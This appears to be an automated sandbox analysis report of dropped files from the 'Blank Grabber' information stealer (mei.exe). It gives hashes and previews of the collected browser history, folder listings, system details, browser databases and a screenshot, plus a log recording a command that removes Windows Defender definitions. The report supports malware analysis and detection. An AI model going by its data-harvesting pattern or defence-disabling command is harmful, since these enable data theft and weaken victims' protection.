                                                                                                                                                                    Preview:==================Blank Grabber===================....URL: https://go.microsoft.com/fwlink/?LinkId=2106243..Title: Install the English Language Pack for 32-bit Office - Microsoft Support..Visits: 2....==================Blank Grabber===================....URL: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17..Title: Install the English Language Pack for 32-bit Office - Microsoft Support..Visits: 2....==================Blank Grabber===================....URL: https://support.microsoft.com/en-us/office/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17?ui=en-us&rs=en-us&ad=us..Title: Install the English Language Pack for 32-bit Office - Microsoft Support..Visits: 2....==================Blank Grabber===================....URL: https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d8e17?ui=en-us&rs=en-us&ad=us..Title: Install the English Language Pack for 32-bit Office - Microsoft Support..Visits: 2....=========

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ???\Directories\Desktop.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1527
                                                                                                                                                                    Entropy (8bit):4.957453121981548
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:Qzk75GPHlPzWDyQ3HvoGy1tQEoyseyfnHLjbnlQyO2D4V:Mk75GPHRWt3HvoGyYEoysNHLjbA2sV
                                                                                                                                                                    MD5:78C626B53B662DD038AA1521874FF442
                                                                                                                                                                    SHA1:1C31D2E97046919E61C5BE5F75F059233AC34133
                                                                                                                                                                    SHA-256:6F33CB0C72A6D1CE2896EBE88AE145D4D6E157390FB197BC465C23F0220C69FF
                                                                                                                                                                    SHA-512:92DB682D81BB22095644718183753FA68421ACAD7C7FB9369F26069706AEA4C0654ED189303E62597EBDA6D842714784E24CDB6C5E21DABAE6DB10698F6A8351
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:Desktop... BPMLNOBVSB.jpg... DTBZGIOOSO.docx... DVWHKMNFNN.jpg... Excel.lnk... FENIVHOIKN.mp3... HTAGVDFUIE.xlsx... KATAXZVCPS.mp3... KATAXZVCPS.pdf... KZWFNRXYKI.jpg... KZWFNRXYKI.pdf... LTKMYBSEYZ.xlsx... mei.exe... NIKHQAIQAU.png... NWTVCDUMOB.pdf... NWTVCDUMOB.png... ONBQCLYSPU.pdf... UMMBDNEQBN.docx... UMMBDNEQBN.png... UOOJJOZIRH.mp3... VLZDGUKUTZ.docx... VLZDGUKUTZ.jpg... VLZDGUKUTZ.xlsx... WKXEWIOTXI.png... XZXHAVGRAG.docx... XZXHAVGRAG.xlsx... YPSIACHYXW.mp3... ..... DTBZGIOOSO... DTBZGIOOSO.docx... KATAXZVCPS.mp3... ONBQCLYSPU.pdf... UMMBDNEQBN.png... VLZDGUKUTZ.jpg... XZXHAVGRAG.xlsx... ..... DVWHKMNFNN..... HTAGVDFUIE..... JSDNGYCOWY..... NEBFQQYWPS..... NIKHQAIQAU..... QNCYCDFIJJ..... UMMBDNEQBN... BPMLNOBVSB.jpg... KZWFNRXYKI.pdf... LTKMYBS

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ???\Directories\Documents.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1497
                                                                                                                                                                    Entropy (8bit):4.946285469274244
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:575hlUDyQ3HvoGy1tQEoyseyfnHLjbnlQyO2D4V:575hqt3HvoGyYEoysNHLjbA2sV
                                                                                                                                                                    MD5:5C58281138F39EDA87491C3E7FA838F2
                                                                                                                                                                    SHA1:9029FEDBF190FB012AEC1B0E8CC44C25F943C8CD
                                                                                                                                                                    SHA-256:294D7B644E5B0CAAB63FB94621AB0C096DDE713E6EE9C8F4BC1FBE65C627C2C3
                                                                                                                                                                    SHA-512:419912AB13189E689B9479C1761EB54E4DCD986687407899ACD9ABEA9CA6DCBC8D5F85B604ADE0CEBC6B2BA769C82BED7CEA30BFBB07DCDC31768AFDAEA9591A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:Documents... BPMLNOBVSB.jpg... DTBZGIOOSO.docx... DVWHKMNFNN.jpg... FENIVHOIKN.mp3... HTAGVDFUIE.xlsx... KATAXZVCPS.mp3... KATAXZVCPS.pdf... KZWFNRXYKI.jpg... KZWFNRXYKI.pdf... LTKMYBSEYZ.xlsx... NIKHQAIQAU.png... NWTVCDUMOB.pdf... NWTVCDUMOB.png... ONBQCLYSPU.pdf... UMMBDNEQBN.docx... UMMBDNEQBN.png... UOOJJOZIRH.mp3... VLZDGUKUTZ.docx... VLZDGUKUTZ.jpg... VLZDGUKUTZ.xlsx... WKXEWIOTXI.png... XZXHAVGRAG.docx... XZXHAVGRAG.xlsx... YPSIACHYXW.mp3... ..... DTBZGIOOSO... DTBZGIOOSO.docx... KATAXZVCPS.mp3... ONBQCLYSPU.pdf... UMMBDNEQBN.png... VLZDGUKUTZ.jpg... XZXHAVGRAG.xlsx... ..... DVWHKMNFNN..... HTAGVDFUIE..... JSDNGYCOWY..... NEBFQQYWPS..... NIKHQAIQAU..... QNCYCDFIJJ..... UMMBDNEQBN... BPMLNOBVSB.jpg... KZWFNRXYKI.pdf... LTKMYBSEYZ.xlsx... UMMBDNEQBN

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ???\Directories\Downloads.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):527
                                                                                                                                                                    Entropy (8bit):4.954491289481831
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:gSbNQOboyvy/Lv42mDye/ItQ7Qs9/NHHOPG193Ufe4PQsDkalx/y:gS9jqDv4tDaQMEH2iWfDTy
                                                                                                                                                                    MD5:D3A3BB1BAC948C895BB855A698CC4D80
                                                                                                                                                                    SHA1:F6E807867DAC5A78467DCBEC570EFFAC65792125
                                                                                                                                                                    SHA-256:1147BE1624DFB4020D6896EEAC7798EEF518B902A19FA3E65651041C999471E0
                                                                                                                                                                    SHA-512:FC58361E7BD08DA1457929B5A9018B0EA0E5BB528B82FAD556544BA8F6524AD055954582C2F3E6FD49F13C5039F1BFF13CC52A62415D7055A67B7B2E2F2644B6
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:Downloads.. BPMLNOBVSB.jpg.. DTBZGIOOSO.docx.. DVWHKMNFNN.jpg.. FENIVHOIKN.mp3.. HTAGVDFUIE.xlsx.. KATAXZVCPS.mp3.. KATAXZVCPS.pdf.. KZWFNRXYKI.jpg.. KZWFNRXYKI.pdf.. LTKMYBSEYZ.xlsx.. NIKHQAIQAU.png.. NWTVCDUMOB.pdf.. NWTVCDUMOB.png.. ONBQCLYSPU.pdf.. UMMBDNEQBN.docx.. UMMBDNEQBN.png.. UOOJJOZIRH.mp3.. VLZDGUKUTZ.docx.. VLZDGUKUTZ.jpg.. VLZDGUKUTZ.xlsx.. WKXEWIOTXI.png.. XZXHAVGRAG.docx.. XZXHAVGRAG.xlsx.. YPSIACHYXW.mp3.. ..No subfolders exist ..

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ???\Directories\Music.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):29
                                                                                                                                                                    Entropy (8bit):4.004364184708143
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:NWMd/PgGn:lpgG
                                                                                                                                                                    MD5:BBC02B9E6ABE2582E89EC3EB60BA9224
                                                                                                                                                                    SHA1:09D5F33BEAA9FEC4C830514C75D45E18B93B6C16
                                                                                                                                                                    SHA-256:3C155AEC9E2C9D9CC509F66A349B5A8CA0ED0DA32B81A6B373E5C07313A1D97F
                                                                                                                                                                    SHA-512:DD6EDC3C907A2E43BAA664B31C47B7BC6C7E6BB727F88A98B060126FB4D2A88089088A510639D75F018B514D52DC8A8F32E5F06371877662CCBE1CD87B36D530
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:Music..No subfolders exist ..

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ???\Directories\Pictures.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):57
                                                                                                                                                                    Entropy (8bit):4.312345549900582
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:rT5JXsqU3vFvABPHc:rjcqU3xMc
                                                                                                                                                                    MD5:3AAA42DD87BD37A58BAB747F15957A92
                                                                                                                                                                    SHA1:06177000882B63BF411FD773C5C48B9BA9D1F1E7
                                                                                                                                                                    SHA-256:D707C8B66E809464D8694719A13C8E1CA96E296F81EDB49A5D0F026E73CA61C0
                                                                                                                                                                    SHA-512:391276BF352F4EC29CA8081DEF96EC1800D50D25D147127F717AFE73AA588DDC58F122819C12F1CB7F28C2740B187395FBCA92927518AB07A1A92A93AA9A933E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:Pictures..... Camera Roll..... Saved Pictures

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ???\Directories\Videos.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):30
                                                                                                                                                                    Entropy (8bit):3.8980685120588388
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:kbFPgGn:k5gG
                                                                                                                                                                    MD5:E140E10B2B43BA6F978BEE0AA90AFAF7
                                                                                                                                                                    SHA1:BBBEB7097FFA9C2DAA3206B3F212D3614749C620
                                                                                                                                                                    SHA-256:C3A706E5567CA4EB3E18543296FA17E511C7BB6BEF51E63BF9344A59BF67E618
                                                                                                                                                                    SHA-512:DF5B92757BF9200D0945AFDA94204B358B9F78C84FBAEB15BDF80EAE953A7228F1C19FDF53ED54669562B8F0137623EA6CEE38F38EF23A6F06DE1673FF05733F
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:Videos..No subfolders exist ..

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ???\Display (1).png

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):703924
                                                                                                                                                                    Entropy (8bit):7.928286534541553
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:uwaVun7Omc3Ae/foOJDnxVjYd5sg8mngu4gzRoUEx3HHjkDut9fFkLCts8:uwdn7JJHO9ncT8OidljF9fS8
                                                                                                                                                                    MD5:E0173B045E7ADAAA5C94E44ED98DFA75
                                                                                                                                                                    SHA1:D51A1206BF59833C21682C9F222F1C80C8D966A5
                                                                                                                                                                    SHA-256:6B750E4DBC9D2CB69AFB84A37B2D0E3D623B74049A7D48CE0F70B2F2AF3C2AB5
                                                                                                                                                                    SHA-512:B7DB0EDEACCFD1A19B4B7B7ACBAAD238AC8EB95F9042F580E929C6B40A211C10223B6EA664600A818BF02C53D6DA99C64695C5FCB28BCD1D759C24F6BBC4E2F9
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e....Y...../&.Z./..y..L.....nZ....p%@.y...@x...... ..9...{o........o..?...u]....."~..^{.}.Y.*...9.....R.^..f.h.m..^.K...u....S....i.l?w8.N..E...v_.d&..8A...S...e.+6.........c_.i.....O.TZ....c.3=i.m..`..>...Q.>...c..u...1v..i...i.>.i1..Gg....)./=<.c../>4mZ_x.a......?8.....dl.a......9..?w...g...}...}V..j .>35..eO...>...O.zc<`...7....E...z3..v_.}..=..;f.#.d.............g....+........q...wN.;..w.s.~..^v{j.v[...;.ewLb|..3c..[b.......+.oy.1{.w.5.v5v.%-.............v..1.W.......3...tK.[...i...N7...../..=...;.c.v.9.....h.......Mil..S{..Rk..s.....YLcA>...oI.,g...Y........<.x..io}]n}l.G[B..msC....[.x|k...L{.k...nI...}..si.lc.}..6.7.&..[..luMfl.S{.....m.Z.6.2......._KK....Y....5..X.y[....._.a..u...7.yC..M..oz...=.0...2...&...v..W..............^...9.0.....A{..v.&.fc.[j..x.F....i|C....)O.g..[..}.....[.\..._..Z.].c.....s....oc....b...5

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ???\System\Antivirus.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                    Entropy (8bit):3.452819531114783
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:jBJiA7X:jBJiA7X
                                                                                                                                                                    MD5:01DAEFE4CAF17BE6854E1A9A0DECE70C
                                                                                                                                                                    SHA1:FEE51C1AB6684F18E59F3FFA9C0296ED1E5DBD28
                                                                                                                                                                    SHA-256:2331BE85A81C008DEDBFEF3BFB0D68EF76AC6BEE37CF9E653591790A21DBBF32
                                                                                                                                                                    SHA-512:AA934777ECB3097CD820EDED81C9C7BAF68039A7E448CEC067317565427212882301BA517ADFB5F63A6677E7D80BAF15837F05DC8C9A9D2BD80F3CA65234ED16
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:Windows Defender

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ???\System\MAC Addresses.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):232
                                                                                                                                                                    Entropy (8bit):3.7605500911024685
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:8LGg0W/FLyzdAFFFFmQmeJIMLrX6H7RuRdP8xBn:8yg0G5ym/mQr/krn
                                                                                                                                                                    MD5:4CDDA0F16FD961C79CC7F6C992162A72
                                                                                                                                                                    SHA1:E2902F6BFCD9323FF0602505A3407D5C95D3016D
                                                                                                                                                                    SHA-256:13294CD8F37E28ED0C467A38BA5835243F42370814683A60D78E6A96FB4A5F64
                                                                                                                                                                    SHA-512:1B925264C378E4B73E8210038257A066254A0C5C3C3CCFF42DDD0C87A6F134D616B1A83C9AD2070051F06858CB072C9818820237D60CC3D559BD6FDE162AC127
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:Physical Address Transport Name ..=================== ==========================================================..EC-F4-BB-EA-15-88 \Device\Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ???\System\System Info.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2266
                                                                                                                                                                    Entropy (8bit):4.497973123152564
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:FjuD3CC2+P3zGGGK/WI49xrsoG7dQhk4m0EjcCGuJUbG3FRZ3:FjuDyC2+yK8xgvdQeKL+Uq1n
                                                                                                                                                                    MD5:95CE12BA5540AD3072B95CE979ED4443
                                                                                                                                                                    SHA1:D4482FB20848EBBEDEA87CD266564C6ED08E6041
                                                                                                                                                                    SHA-256:699F7F2EF5F749D4AA1FE7F037007C8B115ACC44E54235BBA55BE40B16CE31E2
                                                                                                                                                                    SHA-512:8842797D53C0A8AE332B04E36A0381539E0596EFD643E5F4C182C79278CD29683532A7E27C5BB1A6E6603541735A40D9AE9950F0E4B7147B81189ABA6D1F78A2
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:Host Name: user-PC..OS Name: Microsoft Windows 10 Pro..OS Version: 10.0.19045 N/A Build 19045..OS Manufacturer: Microsoft Corporation..OS Configuration: Standalone Workstation..OS Build Type: Multiprocessor Free..Registered Owner: hardz..Registered Organization: ..Product ID: 00330-71388-77104-AAOEM..Original Install Date: 03/10/2023, 09:57:18..System Boot Time: 24/09/2023, 13:00:03..System Manufacturer: Has4HsYbMzGGxKC..System Model: rxugfTwo..System Type: x64-based PC..Processor(s): 2 Processor(s) Installed... [01]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz.. [02]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz..BIOS Version: 4CDTT RCA6N, 21/11/2022..Windows Directory: C:\Windows..System Directory: C:\Window

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ???\System\Task List.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):28794
                                                                                                                                                                    Entropy (8bit):4.6522328913806295
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:Di3wadWI8h5RXSBFoxYVvgT6SBetMbxwklr5ixnfTINnZ5yKgaYt61ty30WSVtFN:Wwn75UyGVc6SBewL09MXx
                                                                                                                                                                    MD5:E666E9EF75A7304E6079363CA38842C7
                                                                                                                                                                    SHA1:3E6FCDAB7210F61EC22553658E29726E1B057D12
                                                                                                                                                                    SHA-256:FA265895B4CB38E8137EA93FF1703B6B2E495245FC2FD181BD134A407F7F6B80
                                                                                                                                                                    SHA-512:587C3AF54F5004425E09ECDB2FE4FC3E404583B115507CF024FA52D4058C1B4D8FC8616E1519215670F44200C3367051A208D2305A7FFC210E5CBD826EA212C3
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:Image Name: System Idle Process..PID: 0..Session Name: Services..Session#: 0..Mem Usage: 8 K....Image Name: System..PID: 4..Session Name: Services..Session#: 0..Mem Usage: 176 K....Image Name: Registry..PID: 92..Session Name: Services..Session#: 0..Mem Usage: 79'456 K....Image Name: smss.exe..PID: 324..Session Name: Services..Session#: 0..Mem Usage: 1'236 K....Image Name: csrss.exe..PID: 408..Session Name: Services..Session#: 0..Mem Usage: 5'304 K....Image Name: wininit.exe..PID: 484..Session Name: Services..Session#: 0..Mem Usage: 7'252 K....Image Name: csrss.exe..PID: 492..Session Name: Console..Session#: 1..Mem Usage: 6'148 K....Image Name: winlogon.exe..PID: 552..Session Name: Console..Session#: 1..Mem Usage: 16'696 K....Image Name: services.exe..PID: 620..Session Name: Services..Session#: 0..Mem Usage: 12'224 K....Image N

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\3zg81OVxae.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):40960
                                                                                                                                                                    Entropy (8bit):0.8553638852307782
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\9bvGTUuUyu.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):114688
                                                                                                                                                                    Entropy (8bit):0.9746603542602881
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\K97uD9mtLU.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):49152
                                                                                                                                                                    Entropy (8bit):0.8180424350137764
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\KSB7qLVvvq.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):28672
                                                                                                                                                                    Entropy (8bit):2.5793180405395284
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\MpCmdRun.log

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                    Category:modified
                                                                                                                                                                    Size (bytes):894
                                                                                                                                                                    Entropy (8bit):3.1177671840990877
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:Q58KRBubdpkoPAGdjrlsV2lWywZk9+MlWlLehW51ICEsV2lWyQI:QOaqdmOFdjrl/8++kWResLIN/cI
                                                                                                                                                                    MD5:3FBAADA3D52A6F380EA82846CD64138D
                                                                                                                                                                    SHA1:198127FF74E089370F6465D283715328061117A8
                                                                                                                                                                    SHA-256:9874B4E559F9D2177225689212F10665CCCF24624E0F38306DC142911A747C4D
                                                                                                                                                                    SHA-512:6052B55DAC267CC3440A185EF3FE07A9248E2A1186C66B3C73B2999B00FF524AED3C3AEE10B8B808AEF5C2027A1CE7DEA27CD3591C19AEA53BE59A64207FCCE0
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. W.e.d. .. D.e.c. .. 0.6. .. 2.0.2.3. .0.9.:.2.4.:.1.5.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. W.e.d. .. D.e.c. .. 0.6. .. 2.0.2.3. .0.9.:.2.4.:.1.5.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\RES6964.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Wed Dec 6 09:27:15 2023, 1st section name ".debug$S"
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1372
                                                                                                                                                                    Entropy (8bit):4.12309006501808
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:H+q9UZfINcYDfH2wKMfbNwI+ycuZhNgakSsPNnqS+d:oBIND1KYbm1ulga38qSe
                                                                                                                                                                    MD5:9556A82DB03378252FB194E574B3F665
                                                                                                                                                                    SHA1:544256FFA305521303EE465DF891D85DFC94188A
                                                                                                                                                                    SHA-256:119547CCA24D2A3BAC3B75383FE490C43C597D96581F0F408598A198269659B3
                                                                                                                                                                    SHA-512:46047CD55282ED241E88798F4BBFE225D37BCF338D7CB83021B6586A61F0359CF8F036DAF169946A6D377A4DFF08539987064ABDD48123C6AE84FF8E62B67C3C
